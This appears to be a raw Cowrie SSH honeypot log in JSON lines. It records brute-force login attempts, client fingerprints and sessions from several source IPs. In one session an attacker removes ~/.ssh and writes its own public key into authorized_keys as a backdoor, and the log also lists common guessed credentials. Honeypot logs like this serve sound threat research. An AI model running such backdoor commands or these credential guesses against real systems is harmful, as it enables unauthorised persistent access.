~","sensor":"my-vps","timestamp":"2025-08-31T01:25:58.926902Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.058877Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.059773Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.219.39","src_port":50444,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5374b7f9d6f","protocol":"ssh","message":"New connection: 152.32.219.39:50444 (1.2.3.4:22) [session: d5374b7f9d6f]","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.100253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.100894Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1427,"dst_ip":"1.2.3.4","dst_port":22,"session":"003208350774","protocol":"ssh","message":"New connection: 102.88.137.80:1427 (1.2.3.4:22) [session: 003208350774]","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.187339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.188252Z","src_ip":"102.88.137.80","session":"003208350774"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.284229Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.318404Z","src_ip":"102.88.137.80","session":"003208350774"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:25:59.875792Z","src_ip":"102.88.137.80","session":"003208350774"}
{"eventid":"cowrie.login.success","username":"root","password":"Welcome@12345","message":"login attempt [root/Welcome@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:26:00.058522Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:26:00.895074Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:26:00.895746Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:26:00.897030Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.028554Z","src_ip":"102.88.137.80","session":"003208350774"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17545,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a693ab47c31","protocol":"ssh","message":"New connection: 102.88.137.80:17545 (1.2.3.4:22) [session: 6a693ab47c31]","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.143775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.144463Z","src_ip":"102.88.137.80","session":"6a693ab47c31"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.265414Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.267044Z","src_ip":"102.88.137.80","session":"6a693ab47c31"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:26:01.471368Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.472126Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.657223Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.658343Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.800949Z","src_ip":"102.88.137.80","session":"6a693ab47c31"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.219.39","src_port":50906,"dst_ip":"1.2.3.4","dst_port":22,"session":"17f0f2ca4340","protocol":"ssh","message":"New connection: 152.32.219.39:50906 (1.2.3.4:22) [session: 17f0f2ca4340]","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.831043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.831961Z","src_ip":"152.32.219.39","session":"17f0f2ca4340"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.925261Z","src_ip":"102.88.137.80","session":"6a693ab47c31"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:01.932052Z","src_ip":"102.88.137.80","session":"9d6382e4926f"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-31T01:26:02.006027Z","src_ip":"152.32.219.39","session":"17f0f2ca4340"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:26:02.742249Z","src_ip":"152.32.219.39","session":"17f0f2ca4340"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:03.919068Z","src_ip":"152.32.219.39","session":"17f0f2ca4340"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.219.39","src_port":51346,"dst_ip":"1.2.3.4","dst_port":22,"session":"92cc4532e5b6","protocol":"ssh","message":"New connection: 152.32.219.39:51346 (1.2.3.4:22) [session: 92cc4532e5b6]","sensor":"my-vps","timestamp":"2025-08-31T01:26:04.097383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-31T01:26:04.098170Z","src_ip":"152.32.219.39","session":"92cc4532e5b6"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-31T01:26:04.274588Z","src_ip":"152.32.219.39","session":"92cc4532e5b6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:26:05.020099Z","src_ip":"152.32.219.39","session":"92cc4532e5b6"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:05.196013Z","src_ip":"152.32.219.39","session":"d5374b7f9d6f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:05.198092Z","src_ip":"152.32.219.39","session":"92cc4532e5b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42262,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b4857e66ba4","protocol":"ssh","message":"New connection: 212.227.235.229:42262 (1.2.3.4:22) [session: 0b4857e66ba4]","sensor":"my-vps","timestamp":"2025-08-31T01:26:11.020033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:26:12.184485Z","src_ip":"212.227.235.229","session":"0b4857e66ba4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:26:12.185395Z","src_ip":"212.227.235.229","session":"0b4857e66ba4"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":57004,"dst_ip":"1.2.3.4","dst_port":22,"session":"548316b64a7b","protocol":"ssh","message":"New connection: 82.67.125.95:57004 (1.2.3.4:22) [session: 548316b64a7b]","sensor":"my-vps","timestamp":"2025-08-31T01:26:13.058525Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:26:13.059560Z","src_ip":"82.67.125.95","session":"548316b64a7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:26:13.096149Z","src_ip":"82.67.125.95","session":"548316b64a7b"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-31T01:26:13.281405Z","src_ip":"82.67.125.95","session":"548316b64a7b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:14.319382Z","src_ip":"82.67.125.95","session":"548316b64a7b"}
{"eventid":"cowrie.login.failed","username":"developer","password":"12345678","message":"login attempt [developer/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T01:26:18.146355Z","src_ip":"212.227.235.229","session":"0b4857e66ba4"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:26:19.996404Z","src_ip":"212.227.235.229","session":"0b4857e66ba4"}
{"eventid":"cowrie.session.connect","src_ip":"150.5.129.10","src_port":44372,"dst_ip":"1.2.3.4","dst_port":22,"session":"599217f8100b","protocol":"ssh","message":"New connection: 150.5.129.10:44372 (1.2.3.4:22) [session: 599217f8100b]","sensor":"my-vps","timestamp":"2025-08-31T01:26:20.115714Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:26:20.117037Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:26:20.327999Z","src_ip":"150.5.129.10","session":"599217f8100b"}
{"eventid":"cowrie.login.success","username":"root","password":"Passwort123","message":"login attempt [root/Passwort123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:26:21.213946Z","src_ip":"150.5.129.10","session":"599217f8100b"}
